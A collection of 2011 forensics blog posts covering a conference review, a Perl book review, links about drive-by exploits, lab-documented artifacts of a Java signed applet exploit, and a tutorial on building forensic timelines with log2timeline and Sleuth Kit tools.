PFIC 2011 Review

Monday, November 14, 2011 Posted by Corey Harrell 2 comments
Last week I had the opportunity to attend Paraben’s Forensic Innovations Conference (PFIC). I had a great time at PFIC; from the bootcamp to the sessions to the networking opportunities. Harlan posted his experience about PFIC, Girl Unallocated shared her thoughts, and SANs Digital Forensic Case Leads discussed the conference as well. The angle I’m going to take in my post is more of a play by play about the value PFIC offers and how the experience will immediately impact my work. Here are a few of my thoughts ….

Affordability

When I’m looking at conferences and trainings the cost is one of the top two things I consider. This is especially true if I’m going to ask my employer to pick up the tab. Similar to other organizations it is extremely hard to get travel approved through my organization. As a public sector employee at times it seems like I’d have better odds getting someone’s first born then to get a request approved through the finance office. The low cost to attend PFIC made it easier for me to get people to sign off on it. The conference with one day training was only $400. The location was the Canyons Resort and attendees got cheaper rates for lodging since it’s the off-season. Rounding out the price tag were the plane flight and shuttle from the airport; both expenses were fairly reasonable. Don’t be fooled by the low costs thinking PFIC is the equivalent of a fast food restaurant while the other conferences are fine dining. PFIC is not only an economical choice but the content covered in the bootcamp and sessions results in more bang for the buck. I like to think PFIC is the equivalent of fine dining with coupons. The cost was so reasonable that I was even going to swing the conference by myself if my employer denied my request to attend. That’s how much value I saw in the price tag especially when I compared it to other DFIR conferences.

Networking Opportunities

The one commonality I’ve see in other’s feedback about PFIC is how the smaller conference size provides opportunities to network with speakers and other practitioners. This was my first DFIR conference so I can’t comment about conference sizes. However, I agree about the ability to talk with people from the field. Everyone was approachable during the conference without having to wait for crowds to disperse. Plus if for some reason you were unable to connect between sessions then PFIC had evening activities such as casino night and night out in town. I meet some great people at the conference and was finally able to meet a few people I only talked to online. Going into the conference I underestimated the value in connecting with others since I was so focused on the content.

Content

Let’s be honest. A conference can be affordable and offer great networking opportunities but if the content is not up to par then the conference will be a waste of time and money. I have a very simple way to judge content; it should benefit my work in some way. This means none of the following would fit the bill: academics discussing interesting theories which has no relevance to my cases, vendors pimping some product as the only way to solve an issue, or presenters discussing a topic at such a high level there is no useful information I can apply to my work. One thing I noticed about the PFIC presenters was they are practitioners in the field discussing techniques and tools they used to address an issue. Pretty much each session I walked away from I felt like I learned a few useful things and got a few ideas to research further. Harlan said in his PFIC 2011 post that “there were enough presentations along a similar vein that you could refer back to someone else's presentation in order to add relevance to what you were talking about”. I think the same thing can be said from the attendee’s perspective. I sat through several presentations on incident response and mobile devices and it seemed as if the presentations built on one another.

I pretty much picked my sessions on a topic I wanted to know more about (incident response) and another topic I wanted to get exposed to (mobile devices). There were a few presentations I picked based on the presenter but for the most part my focus was on incident response and mobile devices. PFIC had a lot more to offer including e-discovery, legal issues, and digital forensics topics but I decided to focus on two specific topics. In the end I’m glad I did since each presentation discussed a different area about the topic which gave me a better understanding. I’m not discussing every session I attended but I wanted to reflect on a few.

        Incident Response

I started PFIC by attending the Incident Response bootcamp taught by Ralph Gorgal. The overview about the process used in the session is shown below and the activities highlighted in red is what the bootcamp focused on (everything to the right of the arrows are my notes about the activity).

     * Detection => how were people made aware
     * Initial Response => initial investigation, interviews, review detection evidence, and facts that incident occurred
     * Formulate Investigation/Collection Strategy => obtain network topology and operating systems in use
     * Identify Location of Relevant Evidence => determine sources locations, system policies, and log contents
     * Evidence Preservation => physical images, logical images, and archive retrieval
     * Investigation
     * Reporting

The approach taken was for us to simulate walking in to a network and trying to understand the network and what logs were available to us. To accomplish that we reviewed servers’ configurations including the impact different configuration settings have and identified where the servers where storing their logs. The Windows services explored during the bootcamp were: active directory, terminal services, internet information server (IIS), exchange, SQL, and ISA. The focus was more on following a logical flow through the network (I thought it was similar to the End to End Digital Investigation) and thinking about what kind of evidence is available and where it was located.

The bootcamp provided a thorough explanation about the thought process behind conducting log analysis during incident response. Even though the course didn’t touch on how to perform the log analysis other sessions offered at PFIC filled in the void. The first session was We’re infected, now what? How can logs provide insight? presented by David Nardoni and Tomas Castrejon. The session started out by first explaining what logs are, breaking down the different types of logs (network, system, security, and application), and explaining what the different log types can tell you. The rest of the session focused on using the free tools Splunk and Mandiant’s Highlighter to examine firewall and Windows event logs. I thought the presentation was put together well and the hands on portion examining actual logs reinforced the information presented to us. The other session I attended about log analysis was Log File Analysis in Incident Response presented by Joe McManus. The presentation was how web server and proxy logs can generate leads about an incident by using the open source tool Log Analysis Tool Kit (LATK). LATK helps to automate the process of log analysis by quickly showing log indicators such as top downloaders/uploaders, SQL queries, and vulnerable web page access. The session was a lab and in the hands on portion we examined web server and proxy logs. This was another session that was well put together and I think the coolest thing about both sessions, besides the great information shared, was that free tools were used to perform log analysis.

        Mobile Devices

Mobile devices are a topic I want to become more knowledgeable about. I went into PFIC wanting to learn a basic understanding about the forensic value contained in mobile devices and get some hands on experience examining them.

The first of the three Paraben labs I attended was Smartphone and Tablet Forensic Processing by Amber Schroader. This wasn’t my scheduled lab so I watched from the back as others did the hands on portion. Amber laid out a case study for the attendees who had to locate a missing 15 year old girl by using Device Seizure to examine an ipad and itouch. What I liked about the session was that answers weren’t provided to the audience which forced them to have to figure out what information on those devices could help locate the girl. A few of the areas examined included: Safari browsing history, Safari download history, Youtube history, facetime history, wifi locations, and pictures. After the case study Amber laid out the different areas on mobile devices containing relevant information but mentioned the biggest issue with mobiles is the sheer number of apps which changes how you look at your data. The next Paraben lab I sat through was Physical Acquisitions of Mobiles by Diane Barrett. The session explained the different methods to acquire a physical image which were chip off, JTAG test access port, flasher boxes, and logical software that can do physical. The cool part about the session was the hands on portion since we used a Tornado flasher box and Device Seizure to acquire a physical image from a Motorola phone. The last Paraben lab I attended was Introduction to Device Seizure by Amber Schroader and Eric Montellese. As the title indicates the session was an introduction on how device seizure can be used to examine mobile devices. The entire session was pretty much hands on; we performed logical and physical acquisitions of a Motorola phone and a logical acquisition of an Android. We also briefly examined both devices to see what information was available.

The only non-Paraben session about mobile devices I attended was iOS Forensics by Ben Lemere. The presentation discussed how to perform forensics on iOS devices using free tools. The information provided was interesting and added to my to-do list but I thought the session would have been better if it was a lab. It would have been awesome to try out the stuff the presenter was talking about.

        Digital Forensic Topics

I couldn’t come up with a better description than Digital Forensics Topics for the sessions I picked based on the presenter or topic. The one session I wanted to mention in this category was Scanning for Low Hanging Fruit in an Investigation by Harlan Carvey. I was really interested in attending Harlan’s session so I could finally see the forensic scanner he has been talking about. Out of all of the sessions I attended I think this was the only session where I knew about the topic being discussed (I follow Harlan’s blog and he has been discussing his forensic scanner). Harlan explained how the scanner is an engine that runs a series of checks searching for low hanging fruit (known artifacts on the system). The usage scenario he laid out involves:

     * Mount an acquired image as a volume (or mount a volume shadow copy)
     * Plug-ins (checks) are based on a specific usage profile
     * Scanner reports are generated including a log of activity (analysts name, details image, plugins ran, etc.)

Harlan mentioned the scanner is still in development but he still did a tool demo by parsing a system’s Windows folder. A few things I noted about what I saw: there’s better documentation than Regripper (analysts name and platform included), still rips registry keys, lists files in a directory (prefetch folder contents were showed), runs external programs (evt.pl was executed), hashes files, and performs different file checks. I saw the value in this kind of tool before I sat through the session but seeing it in action reinforces how valuable this capability would be. I currently try to mimic some activities with batch scripting (see my triage post or obtaining information post). Those scripts took some time to put together and would require some work to make them do something else. I can foresee the forensic scanner handling this in a few seconds since plugins would just need to be selected; plus the scanner can do stuff that's impossible with batch scripting.

Speaking of scripts … Harlan mentioned during his presentation a batch script I put together that runs Regripper across every volume shadow copy (VSC) on a system. I was caught a little off guard since I'd never imagined Harlan mentioning my work during his presentation. I probably didn’t do a good job explaining the script during the session since I wasn’t expecting to talk about it. Here is some information about the script. As Harlan mentioned, I added functionality to the script besides running Regripper (I still have a standalone script for Regripper in case anyone doesn’t want the other functions). The script can identify the differences between VSCs, hash files in VSCs, extract data (preserves timestamps and NTFS permissions) from VSCs, and list files in the VSC. The script demonstrates that you can pretty much do as you please with VSCs whether if you are examining a forensic image or live system. In a few weeks I’ll provide a little more information about the script and why I wrote it, and over the next few months I’ll write a series of posts explaining the logic behind the script before I release it.

PFIC Summary

Overall PFIC was a great experience. I learned a lot of information, I have a to-do list outlining the various things to research/test further, and I meet some great people. The return on investment for my company sending me to the conference is that in a few weeks I’ll be able to perform log analysis, I’m more knowledgeable about mobile device forensics, and if I get into a jam I now have a few people I can reach out to for help.

Closing out my post I wanted to share a few thoughts for improvement. I didn’t have many which I guess is a good thing. ;)

1. Make the names on the name tags bigger. I think my biggest struggle during the conference was trying to figure out peoples’ names since I couldn’t read the tags.

2. Presenters should answer all questions during the session if time permits; especially if the question is a follow-up to something the presenter said. Another attendee asked a great question but I had to stick around for about five minutes after the session to hear the answer. It wasn’t like the question was controversial or something.

3. Verify that all equipment works before the session. One of the labs hit a speed bump when numerous attendees (me included) couldn’t acquire a phone since numerous phones didn’t work. Everyone was able to do the acquisition eventually but time was lost trying to find phones that actually worked.
Labels: ,

Book Review Perl Programming for the Absolute Beginner

Monday, October 24, 2011 Posted by Corey Harrell 5 comments
I find myself in more situations where I’m not completely satisfied with my DFIR tools. They either don’t parse certain information or lack capabilities I want. Batch scripting helped in some situations but the scripts are limited in what I can do. For example, it’s difficult (if not impossible) to create a script to extract information from an artifact that’s not supported by existing tools. Learning a programming language has been at the top of my to-do list for some time due to these reasons. I was browsing my local book store when I came across the book Perl Programming for the Absolute Beginner.

Why Perl Programming for the Absolute Beginner

I chose the book after I skimmed through a few other Perl programming books. Perl Programming for the Absolute Beginner is written for an audience without previous programming experience. The book goes into great detail explaining basic programming concepts such as variables, arrays, loops, and subroutines. I took a C++ course in my undergraduate about seven years ago and the only thing I remember is that I took a C++ course. Basically, I have zero programming knowledge including not knowing much about programming concepts. A lot of the books I skimmed, such as Learning Perl, don’t take the time to explain the basic concepts since they expect the reader to be already familiar with them. I wanted a book to explain the basics in addition to the language; Perl Programming for the Absolute Beginner fit the bill.

Numerous books I looked at use exercises at the end of each chapter to reinforce the material covered. The exercises are pretty simple and perform one action such as a math calculation. Perl Programming for the Absolute Beginner takes a different approach in teaching Perl. Instead of individual exercises the book has the reader write computer games which are fully functioning programs. I thought this approach does a better job showing how to use Perl since it covers the planning, organizing, coding, and testing activities involved with script development. Plus the approach was entertaining and it kept my interest. I’d rather write a “Fortune Teller Game” than a script to compute “the circumference of a circle”. ‘nuff said.

What I learned

My review is going to be a little different. I’m neither discussing the book’s contents (if you want to know then read the table of contents) nor how helpful the book could be. Instead I’m talking about what I learned from the book and how it has impacted my DFIR work so far.

Seeing Behind the Curtain

Bear with me for this analogy… When I was younger I used to love watching Kung-fu. At times I watched movies completely in another language without subtitles. I got the gist of what was going on by watching body language, facial expressions, tones of people’s voices, and the bad guys getting stomped. However, when I watched the same movie in English (subtitles or dubbed over) I realized how much I missed about the movie’s plot. Learning Perl is the equivalent of adding subtitles or dubbed English to a Kung-fu movie. Before I understood the gist of what my Perl tools were doing but it’s completely different when you can read and actually understand the code to see how it produces its output. It let me see behind the tool abstraction curtain.

Extending my Capability

I was considering between learning Perl or Python since programs in my toolbox are written in those languages. One of my goals is to learn a language that lets me customize tools to better meet my needs. I picked Perl because two tools I extensively use are written in Perl and plug-in based. Plug-ins allow the tool to be extended fairly easily and I felt knowing how to write them would have a greater impact on my DFIR work. My immediate need was for a Regripper plug-in to parse the UserInfo registry key in an NTUSER.DAT hive (I could have asked others for this but I wanted to learn how to do it). In the past I manually examined the UserInfo key in the NTUSER.DAT hive and if present the hives in system restore points or volume shadow copies. Performing the task was time consuming but I needed to know the information. Perl Programming for the Absolute Beginner taught me enough about Perl to make it pretty easy to write a plug-in once I re-read the creating plug-ins section in Windows Registry Forensics. Taking the time to put the userinfo plug-in together will make things easier and faster for me in the future since I can now extract the information from a system in seconds. Talk about improving efficiency.

Breaking my Handcuffs

I’m still wearing handcuffs since I’m still dependent on existing tools and scripts created by others. However, Perl Programming for the Absolute Beginner opened my eyes to a future where if I encounter an artifact not supported by my tools then I could just write my own. A future where I no longer have to be satisfied and accept tools’ outputs when I want to see data differently. A future where repetitive tasks can be automated enabling me to spend more time on analyzing information. The book opened my eyes to a world where I don’t have to be handcuffed to my DFIR tools and the capabilities they provide. Perl Programming for the Absolute Beginner did not make me into a tool developer but it provided me with a foundation to build upon.

Four Star Review

Not all is rosy with the book though. I normally can overlook typos but I’m not very forgiven when there are typos in the code the reader is suppose to copy. It’s bad enough that beginners are going to mess something up and spend time tracking down their own mistakes. There’s no need to add even more typos resulting in people questioning themselves wondering what else they did wrong. Chapter Four’s Star Wars Quiz declares a variable named $valid but the rest of the program uses the variable $isvalid (on page 129). That small typo makes the game not work until the variable $valid is changed to $isvalid. As a reader I shouldn’t be required to find typos in code in order to make things work. I spend enough time finding my own mistakes as it is.

Overall I give Perl Programming for the Absolute Beginner a four star review (based on Amazon’s rating scheme). I highly recommend the book for anyone looking to learn the Perl programming language in addition to basic programming concepts. The book teaches the basics in an entertaining way enabling anyone to write simple scripts to solve issues. For those with programming backgrounds then I suggest looking elsewhere for a book on Perl since this is too basic. Learning Perl is a decent candidate because the target audience is for people familiar with programming concepts (I moved on to this book after reading Perl Programming for the Absolute Beginner).
Labels: ,

Linkz about Attacks

Sunday, October 16, 2011 Posted by Corey Harrell 0 comments
In this round of links I’m talking about drive-bys, malicious ads, web attack artifacts revealed with Mandiant’s Highlighter, and a justification for companies to fail security audits.

Video Showing Drive-by Download from MySQL

As most people probably heard by now MySQL.com was serving up malware to its visitors last month. SecurityMonkey put together the post [Video]: Watch Malware Drive-By Download from MySQL.com which contained various links about the incident. One link was to a video created by Armorize that captured what happened to anyone who visited the website when the issue was occurring. The video is about five minutes long and I highly recommend for people to check it out. I’ve never seen a drive-by broken down before by video. The video by itself is pretty cool but I think the true value is in what it shows about the attack vector infecting people visiting the website. Check out the sequence of events I noted from the video:

        -  (00:55) Internet Explorer starts to load the website mysql.com
        -  (01:04) Java.exe starts running on the computer
        -  (01:11) Executables are dropped onto the computer. These were the attack’s payload
        -  (03:43) It was revealed that a Jar file was downloaded to the system and this is why Java started. The Jar file download occurred before the executables appeared on the computer

The attack summary was a user visited mysql.com and eventually gets redirected to a site hosting the Black Hole exploit pack. In that instance, the exploit pack used a Java vulnerability to infect the system. Why does any of this even matter … knowing this can help determine how a system was compromised. Let’s say someone was dealing with an infected computer and were trying to figure out how the malware got installed on the computer. The video didn’t show what was on the system’s hard drive but the attack is very similar to the Java exploit artifacts I documented. To date I’ve documented three different ones which were Java Signed Applet Exploit Artifacts, CVE-2010-0840 (Trusted Methods) Exploit Artifacts, and CVE-2010-0094 (RMIConnectionImpl) Exploit Artifacts. There was a consistent pattern to the all the artifacts:

        -  Temporary file created (Jar file got dropped onto the system)
        -  Indications of a vulnerable Java executing
        -  Internet activity showed a user visited a malicious website

The key difference (besides the Java vulnerability) between the Armorize video and the method I used to document the exploit artifacts was the tool used to create and deliver the exploit. The video documented a Java exploit from the Blackhole exploit pack and according to Contagio’s August 2011 Exploit Pack Overview spreadsheet Blackhole goes for $1,500 a year. My testing leveraged the freely available Metasploit to document exploit artifacts. Taking the time to document the exploit artifacts can pay big dividends during an examination when trying to determine the “how”. How did the system get infected? Well if the activity on the system around the time malware was created shows either a Jar file appearing or Java executing then a Java vulnerability may have been the culprit. If there is Internet activity then the Internet and a web browser may have been used to deliver the exploit to the system.

Malicious Advertisement Leads to PDF Exploit

I first started looking into attack vector artifacts when one of my systems got whacked with a Fake AV virus. At the time I had the DF skills but I lacked the IR skills such as figuring out what happened to my system. I took a shot at trying to figure out how the system became infected to see if I could. It took me a little bit but I was not only able to find the malware dropped onto my system but I traced the infection back to Yahoo email. I was even able to determine the exploit used in the drive-by. It was a malicious PDF file that targeted a vulnerability in Adobe Reader. The PDF appeared on the system in the temporary Internet files folder just prior to the first malware getting dropped. The experience taught me valuable lessons. First the more obvious one; don’t quickly check your web email from a test system with vulnerable apps even if it’s only for a few seconds. The second and more important lesson was the need to understand how different attacks appear on a system after they have occurred. The examination took me some time to figure out since I didn’t really know what to expect or what artifacts to look for.

I recently came across TrendMicro’s post Malicious Ads Lead to PDF Exploits. The post is from last year but it made me reflect on the experience that motivated me to start my journey into incident response. The post mentioned how malvertisements on a popular web-based email service lead to users being directed to sites with exploits. The article isn’t written from the DFIR perspective since it was focused on the vulnerabilities targeted in the attack. There wasn’t much discussion about the artifacts left on a system either besides malicious PDFs and internet activity. The little information provided did show how the attack occurred.

        -  User visits web based email service
        -  Redirect downloads malicious PDFs targeting Adobe Reader vulnerabilities
        -  Adobe reader has to process the PDF for the exploit to be successful and install malware

The attack pattern is something I’ve seen in a few other places. My infected test system had the same sequence of events but it took me a bit to actually see it. That examination made me more aware about the artifacts associated with a PDF exploit thereby making it easier to spot it in a few other examinations I did afterwards. I also saw the same pattern on my test systems I exploited with Metasploit. I researched a PDF exploit in the post CVE-2010-2883 (PDF Cooltype) Exploit Artifacts. Do the following areas I noted in the post look familiar?

        -  PDF document created
        -  There were references about a PDF file being accessed
        -  A vulnerable Adobe Reader started on the system

Web Attack Artifacts

Russ McRee’s October’s Toolsmith Log Analysis with Highlighter is a great read for a couple reasons. I enjoy reading his articles since he provides an overview about a tool’s functionality. In this edition he doesn’t disappoint as he covers how to perform log analysis with Mandiant’s Highlighter. Showing how to do log analysis is cool enough but he demonstrates the tool by looking for attacks in his website’s logs. He looks for specific artifacts caused by remote file include and directory traversal attacks. I haven’t found any references that document the artifacts left in logs by different attacks so I enjoyed reading about it. Eventually I’m going to start researching the artifacts left in logs but I still have a lot to do with the artifacts left on systems.

Fail a Security Audit Already Will You

When I started working full time in the information security field I was performing vulnerability assessments and security audits. Maybe I’m a little biased because of my background but I can see the value security audits provide when performed correctly. I’m not talking about audits where boxes are just checked off but risk based audits looking at the security controls protecting an organization’s critical information. Andreas M. Antonopoulos's article Fail a security audit already -- it's good for you provides an argument for why companies should fail security audits. The article makes some great points but the one thing I thought was missing is when organizations try to justify (aka make excuses) or minimize why serious weaknesses are present. Take patching as an example.

Patching isn’t done to prevent applications and systems from breaking. I was a system admin so I get it … especially since I’ve dealt with the hassle of tracking down the patches that jacked up my systems. However, using the reason as a justification to not patch without doing any due diligence by you know actually testing patches to see if anything breaks is something else. The SANs Top Cyber Security Risks report from a few years ago highlighted how third party applications on client systems are targeted. The exploits I discussed in this linkz edition targeted vulnerabilities in client applications such as Java and Adobe. How can these vulnerabilities on computers with users surfing the web be lumped into the same category as some application supporting a critical business process with neither of them getting patched? The security risk didn’t go away and the vulnerabilities don’t magically repair themselves. It’s too late to finally figure it out once the organization is staring at the artifacts from a successful exploit.

Java Signed Applet Exploit Artifacts

Thursday, October 13, 2011 Posted by Corey Harrell 0 comments
Artifact Name

Java Signed Applet Exploit Artifacts

Attack Vector Category

Exploit

Description

A signed Java applet is presented to a user and a dialog box asks the user if they trust it. If the user is socially engineered to run the applet then arbitrary code executes under the context of the currently logged on user.

Attack Description

This description was obtained using the Metasploit exploit reference. A user visits a web page hosting the signed Java applet and a Java window pops up asking the user to run the applet. Once the user runs it then a program is downloaded and executed on the system.

Exploits Tested

Metasploit v4.0 multi\browser\java_signed_applet

Target System Information

* Windows XP SP3 Virtual Machine with Java 6 update 16 using administrative user account

* Windows XP SP3 Virtual Machine with Java 6 update 16 using non-administrative user account

Different Artifacts based on Administrator Rights

No

Different Artifacts based on Software Versions

Not tested

Potential Artifacts

The potential artifacts include a Jar file and the changes the exploit causes in the operating system environment. The artifacts can be grouped under the following three areas:

        * Temporary File Creation
        * Indications of the Vulnerable Application Executing
        * Internet Activity

Note: the documenting of the potential artifacts attempted to identify the overall artifacts associated with the vulnerability being exploited as opposed to the specific artifacts unique to the Metasploit. As a result, the actual artifact storage locations and filenames are inside of brackets in order to distinguish what may be unique to the testing environment.

        * Temporary File Creation

            -JAR file created in a temporary storage location on the system within the timeframe of interest. [C:/Documents and Settings/Administrator/Local Settings/Temp/jar_cache5490377340104033776.tmp. The contents of the JAR file contained a manifest file, a class file, and an executable.


       * Indications of the Vulnerable Application Executing

           - Log files indicating Java was executed within the timeframe of interest. [C:/Documents and Settings/Administrator/Application Data/Sun/Java/Deployment/deployment.properties, C:/Documents and Settings/Administrator/Local Settings/Temp/java_install_reg.log, and C:/Documents and Settings/Administrator/Local Settings/Temp/jusched.log] The picture below shows the contents of the deployment.properties log.


            - Prefetch files of Java executing. [C:/WINDOWS/Prefetch/JAVA.EXE-0C263507.pf]

            - Registry modification involving Java executing at the same time as reflected in the jusched.log file. [HCU-Admin/Software/JavaSoft/JavaUpdate/Policy/JavaFX]

            - Folder activity involving the Java application. [C:/Program Files/Java, C:/Documents and Settings/Administrator/Application Data/Sun/Java/Deployment/, and C:/Documents and Settings/Administrator/Local Settings/Temp/hsperfdata_username]

        * Internet Activity

            - Web browser history of user accessing websites within the timeframe of interest. [Administrator user account accessed the computer -192.168.11.200- running Metasploit]

            - Files located in the Temporary Internet Files folder. [C:/Documents and Settings/Administrator/Local Settings/Temporary Internet Files/Content.IE5/]

           - Registry activity involving Internet Explorer

Timeline View of Potential Artifacts

The images below shows the above artifacts in a timeline of the file system from the Windows XP SP3 system with an administrative user account. The timeline includes the file system, registry, prefetch, event logs, and Internet Explorer history entries.






References

Exploit Information


Metasploit Exploit Information http://www.metasploit.com/modules/exploit/multi/browser/java_signed_applet

Building Timelines – Tools Usage

Sunday, September 25, 2011 Posted by Corey Harrell 3 comments
Tools are defined as anything that can be used to accomplish a task or purpose. For a tool to be effective some thought has to go into how to use it. I have a few saws in my garage but before I try to cut anything with them I first come up with a plan on what I’m trying to accomplish. Timeline tools are no different and their usage shouldn’t solely consist of running commands. The post Building Timelines – Thought Process Behind It discusses an approach to develop a plan on the way timeline tools will be used. This post is the second part where the tools to build timelines is discussed.

There is not a single tool for building timelines since tools vary based on the DFIR practitioner’s needs and preferences. When I first started learning about timeline analysis I read as much as I could about the technique and downloaded various tools to test their capabilities to see what worked best for me. I’m discussing my current method and a few tools that I build timelines with. The method is different from what I was doing last month and will probably change down the road as tools are updated, new tools are released, and my needs/preferences vary.

I’m trying to show different ways timelines can be built in addition to building my own timeline for an infected Windows XP SP3 test system. The artifacts selected for my timeline are:  event logs, Internet Explorer history, XP firewall logs, prefetch files, Windows restore points, select registry keys, entire registry hives, and the file system metadata. The user specific artifacts (ie history and registry keys from the NTUSER.DAT hive) only need to be parsed for the administrator user account. The extraction of the timestamps from those artifacts will be accomplished in the following activities:

        -  Artifact Timestamps
        -  File System Timestamps
        -  Registry Timestamps

Tools’ Output

Before a timeline can be created one must first choose what format to use for the tools’ output. Selecting the format up front ensures multiple tools’ outputs can go into the same timeline. Three common output types are: bodyfile, TLN, and comma-separated value (csv). The bodyfile format shows file activity and separates the output into different sections. The version in use will determine what the sections are but the Sleuthkit Wiki bodyfile page explains the differences and provides an example. The TLN format breaks the data up into five sections: time, source, host, user, and description. Harlan provided a great description about his format in the post Timeline Analysis...do we need a standard? and in Appendum for the post TimeLine Analysis, pt III. The csv format stores data so it is separated by rows and columns. This format works well for viewing the timeline data in spreadsheets. However, unlike the bodyfile and TLN formats csv is not a standard format. The csv schema from tools may differ resulting in the need for additional processing for the outputs to go into the same timeline. Kristinn’s post Timeline Analysis 201 – review the timeline explains the csv schema used in his Log2timeline tool.

I mostly review timelines with spreadsheet programs so I opted for Log2timeline’s csv format. I use Log2timeline to convert other tools’ outputs into proper csv schema. My timeline in this post uses the csv format and I demonstrate how to convert between different formats.

Artifact Timestamps

I couldn’t come up with a good name when I was thinking about how to explain the different activities I do when creating timelines. What I mean when I say artifact timestamps is everything expect for the last write times from dumped registry hives and timestamps from the file system. The different tools to extract timestamps from artifacts include Harlan’s timeline tools and Log2timeline. Harlan accompanies his tools posted on the Win4n6 yahoo group with a great step by step guide about building timelines with his tools. I cover how to use Log2timeline and the following is a brief explanation about the tool’s syntax:

log2timeline.pl -z timezone -f plugin/plugin_ file -r -w output-file-name log_file/log_dir

        -z defines the timezone for the computer where the artifacts came from
        -f specifies the plugin or pluging file to run against the file/directory
        -w specifies the file to write the output to
        -r makes log2timeline work in recursive mode so the folder specified and its subfolders are all examined for artifacts

Options to Extract Timestamps with Single Plugin or Default Plugin File

Log2timeline is plugin based and the tool can execute a single plugin against a single file/directory or execute a plugin file against multiple files in directories. I prefer to use custom plugins for my timelines but first I wanted to show the single plugin and default plugin file methods. The command below will execute the evt plugin to parse the Security windows event log and the output will be written to a file named fake-timeline.csv.

log2timeline.pl -z local -f evt -w fake-timeline.csv F:\WINDOWS\system32\config\SecEvent.Evt

The single plugin method requires multiple commands to extract timestamps from different artifacts in a system. Plugin files address the multiple command issue since the file contains a list of plugins to run. Log2timeline comes with a few default plugin files and the best one that fits my selected artifacts is the winxp plugin file. The command below runs the winxp plugin file against the entire mounted forensic image (the red text highlights what is different from the previous command).

log2timeline.pl -z local -f winxp -w fake-timeline.csv –r F:\

The winxp plugin file makes things a lot easier since only one command has to be typed. However, the file parses a lot more data then I actually need. The plugins executed are: chrome, evt, exif, ff_bookmark, firefox3, iehistory, iis, mcafee, opera, oxml, pdf, prefetch, recycler, restore, setupapi, sol, win_link, xpfirewall, wmiprov, ntuser, software, and system. I only wanted to parse IE history but winxp is doing every browser supported by log2timeline. I only wanted to parse artifacts in the administrator’s user profile but the above command is parsing artifacts from every profile on the system. I wanted to limit my timeline to specific artifacts but winxp is giving me everything. Not exactly what I’m looking for.

Single plugins and default plugin files are viable methods for building timelines. However, neither let’s me easily build a timeline containing only my selected artifacts that were tailored to the case and system I’m processing. This is where custom plugin files come into play and why I use them instead.

Extracting Timestamps for my Timeline with Custom Plugin Files

Kristinn deserves all the credit for why I know about the ability to create custom plugin files. I’m just the guy who asked him the question and decided to blog the answer he gave me. A custom plugin file is a text file that lists one plugin per line and is saved with the .lst file extension. The picture is a custom file named test.lst and it contains plugins for prefetch files, event logs, and system restore points.

Custom Plugin File Example

The custom file is placed in the same directory where the default plugin files are located. On a Windows system with Log2timeline 0.60 installed the directory is C:\Perl\lib\Log2t\input\.

I only want to parse artifacts in the administrator user profile instead of all user profiles stored on the system. At the time I wrote this post, Log2timeline doesn’t have the ability to exclude full paths (such as unwanted user profiles) when running in recursive mode. As a result I create two custom plugin files; one file parses the artifacts in a user profile while the other parses the remaining artifacts throughout the system. This lets me control what user profiles to extract timestamps from since I can run the user plugin file against the exact ones I need.

The user custom plugin file is named custom_user.lst and contains the iehistory and ntuser plugins. The other custom plugin file is named custom_system.lst and contains the evt, xpfirewall, prefetch, and restore plugins. The two commands below execute the custom_user.lst against the administrator’s user account profile and custom_system.lst against the entire drive while saving the output to the file timeline.csv.

log2timeline.pl -z local -f custom_user -w C:\win-xp\timeline.csv –r “F:\Documents and Settings\Administrator”

log2timeline.pl -z local -f custom_system -w C:\win-xp\timeline.csv –r F:\

The commands extracted the timestamps from all of the artifacts on my list except for the entire registry hives last write times and file system timestamps. The picture shows the timeline built so far. The timeline is sorted and the section shown is where the prefetch file I referenced in the post What’s a Timeline is located.

Timeline Data Added by Custom Plugin File

Filesystem Timestamps

The filesystem timestamps is concerned about adding the activity involving files and directories to the timeline. There are different tools that extract the information including FTK Imager, AnalyzeMFT, Log2timeline, and the Sleuthkit. I’m demonstrating two different methods to add the data to my timeline to show the differences between the two. The tools for the first method include the Sleuthkit and Log2timeline while the second method only uses Log2timeline.

The fls.exe program in the Sleuthkit will list the files and directories in an image. The command below creates a bodyfile containing the files/directories’ activity in the test forensic image and stores the output in the file named fls-bodyfile.txt. (the –m switch makes the output format mactime, -r is for recursive mode, and –o is the sector offset where the filesystem starts)

fls.exe -m C: -r -o 63 C:\images\image.dd >> C:\win-xp\fls-bodyfile.txt

Fls.exe’s output is in the bodyfile format but my timeline is in Log2timeline’s csv format. Log2timeline has plugins to parse output files in the TLN and bodyfile formats. This means the tool can be used to convert one format into another. The command below parses the fls-bodyfile.txt file and adds the data to my timeline.

log2timeline.pl -z local -f mactime -w C:\win-xp\timeline.csv C:\win-xp\ fls-bodyfile.txt

The picture highlights the new entries to the section of my timeline. Doesn’t the story about what occurred become clearer?

Timeline Data Added by fls.exe

The file system in the Windows XP test system is NTFS. NTFS stores two sets of timestamps which are the $FILE_NAME attribute and $STANDARD_INFORMATION timestamps. Fls.exe along with the majority of the other forensic tools shows the $STANDARD_INFORMATION timestamps. However, there may be times when it’s important two include both sets of timestamps in a timeline. One such occurrence is when there’s a concern that timestamps might have been altered. Parsing the Master File Table ($MFT) can add both sets of timestamps to a timeline. The command below shows Log2timeline parsing the $MFT and adding the output to the file timeline-copy.csv.

log2timeline.pl -z local -f mft -w timeline.csv F:\$MFT

The picture below highlights the new entries for the data extracted from the $MFT. Notice the difference between the timeline only containing the $STANDARD_INFORMATION timestamps compared to containing both timestamps. Quick side note: the mft plugin could be added to a custom plugin file.

Timeline Data Added by $MFT

Registry Timestamps

In the artifact timestamps section Log2timeline extracted data from select registry keys. However, there are times when I want all registry keys’ last write times from registry hives. So far I want this ability when dealing with malware infections since it helps identify the persistence mechanism and registry modifications. The tools to extract the last write times from registry hives include Harlan’s regtime.pl script (I obtained it from the Sift 2.0 workstation) and Log2timeline. For my timeline I’m interested in the System, Software, and administrator’s NTUSER.DAT registry hives. The commands below has regtime.pl extracting the last write times from each hive and storing it in the bodyfile file named reg-bodyfil.txt (the –m switch prepends the text to each line and the –r switch is the path to the registry hive).

regtime.pl –m HKLM/system –r F:\Windows\System32\config\system >> C:\win-xp\reg-bodyfile.txt

regtime.pl –m HKLM/software –r F:\Windows\System32\config\software >> C:\winxp\reg-bodyfile.txt

regtime.pl –m HKCU/Administrator –r "F:\Documents and Settings\Administrator\NTUSER.DAT" >> C:\win-xp\reg-bodyfile.txt

Regtime.pl’s output is in the bodyfile format so Log2timeline makes the format conversion as shown in the command below.

log2timeline.pl -z local -f mactime -w C:\win-xp\timeline.csv C:\win-xp\reg-bodyfile.txt

